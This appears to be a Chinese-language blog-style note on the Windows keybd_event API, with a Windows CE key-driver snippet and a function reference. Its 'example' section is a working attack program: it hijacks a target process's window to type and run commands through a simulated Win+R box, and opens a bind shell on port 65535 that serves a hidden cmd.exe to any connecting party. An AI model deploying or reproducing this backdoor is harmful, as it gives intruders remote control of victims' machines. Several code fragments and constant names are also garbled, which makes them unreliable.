1。定义wince的按键
自己可以写一个按键驱动,很简单,当有按键时用keybd_event函数
例如:定义一个左按键时,
在按下按键时:
keybd_event (VK_LEFT ,0x25, KEYEVENTF_SILENT, 0);
在松开按键时:
keybd_event(VK_LEFT ,0x25, KEYEVENTF_SILENT | KEYEVENTF_KEYUP, 0);
------------------------------------------------------------------------------------------------------------------------------
详细用法如下:
函数功能:该函数合成一次击键事件。系统可使用这种合成的击键事件来产生WM_KEYUP或WM_KEYDOWN消息,键盘驱动程序的中断处理程序调用keybd_event函数。在Windows NT中该函数己被使用Sendlhput来替代它。
函数原型;VOID keybd_event(BYTE bVk,BYTE bScan,DWORD dwFlags,DWORD dwExtralnfo);
参数:
bVk:定义一个虚据拟键码。键码值必须在1~254之间。
bScan:定义该键的硬件扫描码。
dwFlags:定义函数操作的名个方面的一个标志位集。应用程序可使用如下一些预定义常数的组合设置标志位。
KEYEVENTF_EXETENDEDKEY:若指定该值,则扫描码前一个值为OXEO(224)的前缀字节。DEYEVENTF_KEYUP:若指定该值,该键将被释放;若未指定该值,该键交被接下。dwExtralnfo:定义与击键相关的附加的32位值。
返回值:该函数无返回值。
备注:尽管keybd_event传递一个与OEM相关的硬件扫描码给系统,但应用程序不能用此扫描码。系统在内部将扫描码转换成虚拟键码,并且在传送给应用程序前清除键码的UP/down位。应用程序可以摸拟PRINTSCREEN键的按下来获得一个屏幕快照,并把它存放到剪切板中。若要做到这一点,则要将keybd_event的bVk参数置为VK_SNAPSHOT,bScan参数置为0(用以获得全屏快照)或hScan置为1(仅获得活动窗口的快照)。Windows CE:WindowsCE支持dwFlags参数附加的标志位。即使用KEYEVENTF_SILENT标志模拟击键,而不产生敲击的声音。Windows CE不支持KEYEVENTF_EXTENDEDKEY标志。
-------------------------------------------------------------------------------------------------------------------------------
case 6: //模拟键盘击键
{
WORD &key=65;
sRecvString = AnsiString(Key)
int strCusKey = StrToInt(sRecvString);
keybd_event( strCusKey, 0, 0, 0);// press H
keybd_event( strCusKey, 0, KEYEVENTF_KEYUP, 0);
}
break;
-------------------------------------------------------------------------------------------------------------------------------
例子:
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define HAXORCITOS 65535
unsigned int pid = 0;
char buf[256]="";
/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
DWORD hwndid;
int i;
GetWindowThreadProcessId(hwnd,&hwndid);
if (hwndid == pid){
/*
Replace keybd_event with SendMessage() and PostMessage() calls
*/
printf("HANDLE Found. Attacking =)/n");
SetForegroundWindow(hwnd);
keybd_event(VK_LWIN,1,0,0);
keybd_event(VkKeyScan('r'),1,0,0);
keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
for(i=0;i<strlen(buf);i++) {
if (buf[i]==':') {
keybd_event(VK_SHIFT,1,0,0);
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
} else {
if (buf[i]=='//') {
keybd_event(VK_LMENU,1,0,0);
keybd_event(VK_CONTROL,1,0,0);
keybd_event(VkKeyScan('�'),1,0,0);
keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);
keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('�'),1,KEYEVENTF_KEYUP,0);
} else {
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
}
}
}
keybd_event(VK_RETURN,1,0,0);
keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);
exit(1);
}
}
/**************************************************************/
int BindShell(void) { //Bind Shell. POrt 65535
SOCKET s,s2;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSADATA HWSAdata;
struct sockaddr_in sa;
int len;
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); }
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
len=sizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); }
if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
s2 = accept(s,(struct sockaddr *)&sa,&len);
closesocket(s);
ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) );
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = (void *) s2; // SOCKET
si.hStdOutput = (void *) s2;
si.hStdError = (void *) s2;
if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {
doFormatMessage(GetLastError());
return(-1);
}
WaitForSingleObject( pi.hProcess, INFINITE );
closesocket(s);
closesocket(s2);
printf("SALIMOS.../n");
Sleep(5000);
return(1);
}
/**************************************************************/
void main(int argc, char* argv[])
{
HWND console_wnd = NULL;
if (argc >= 2) {
pid = atoi (argv[1]);
strncpy(buf,argv[0],sizeof(buf)-1);
EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
} else {
BindShell();
}
}
/**************************************************************/
keybd_event(vk_f1, mapVirtualKey(vk_f1, 0), 0, 0);
keybd_event(vk_f1, mapVirtualKey(vk_f1, 0), KEYEVENTF_KEYUP,0);